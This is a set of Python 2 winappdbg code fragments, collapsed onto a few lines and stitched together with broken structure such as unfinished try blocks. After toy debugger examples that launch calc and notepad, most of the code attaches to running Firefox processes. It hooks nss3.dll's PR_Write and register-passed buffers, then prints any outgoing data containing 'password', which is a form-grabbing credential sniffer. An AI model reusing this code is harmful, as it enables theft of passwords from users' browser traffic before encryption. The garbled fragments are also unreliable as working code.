def simple_debugger(): handler = EventSift(MyEventHandler) # handler = MyEventHandler() # try uncommenting this line... with Debug(handler) as debug: debug.execl("calc.exe") debug.execl("notepad.exe") debug.execl("charmap.exe") debug.loop()
def exit_process(self, event): print "Detached from %s" % self.name handler = EventSift(MyEventHandler) #handler = MyEventHandler() # try uncommenting this line... with Debug(handler) as debug: debug.execl(self.name) debug.loop()
def single_step(self, event): thread = event.get_thread() process = event.get_process() buffer = thread.get_register("Rdx") # 2nd param buf size = thread.get_register("R8") # 3rd param buf amount text = str(process.read(buffer, size)) for pattern in self.patterns: if pattern in text: mylogger.log_text("-" * 50) mylogger.log_text(text) mylogger.log_text("-" * 50) mylogger = winappdbg.Logger() handler = EventSift(FirefoxHardHookEventHandler) with Debug(handler, bKillOnExit=False) as debug: found_ff = False debug.system.scan() for (proc, name) in debug.system.find_processes_by_filename("firefox.exe"): pid = proc.get_pid() debug.attach(pid) print "[*] attached debugger to firefox: %d" % pid found_ff = True if found_ff: try: print "[*] monitoring CTRL-C to exit" debug.loop()
class FirefoxSoftHookEventHandler(EventHandler): apiHooks = { "nss3.dll": [("PR_Write", (win32.PVOID, win32.PVOID, win32.DWORD32))] } def pre_PR_Write(self, evt, ra, fd, buf, amount): proc = evt.get_process() data = proc.read(buf, amount) if "password" in data: print "[+] %s" % data handler = EventSift(FirefoxSoftHookEventHandler) with Debug(handler, bKillOnExit=False) as debug: found_ff = False debug.system.scan() for (proc, name) in debug.system.find_processes_by_filename("firefox.exe"): pid = proc.get_pid() debug.attach(pid) print "[*] attached debugger to firefox: %d" % pid found_ff = True if found_ff: try: print "[*] monitoring CTRL-C to exit" debug.loop()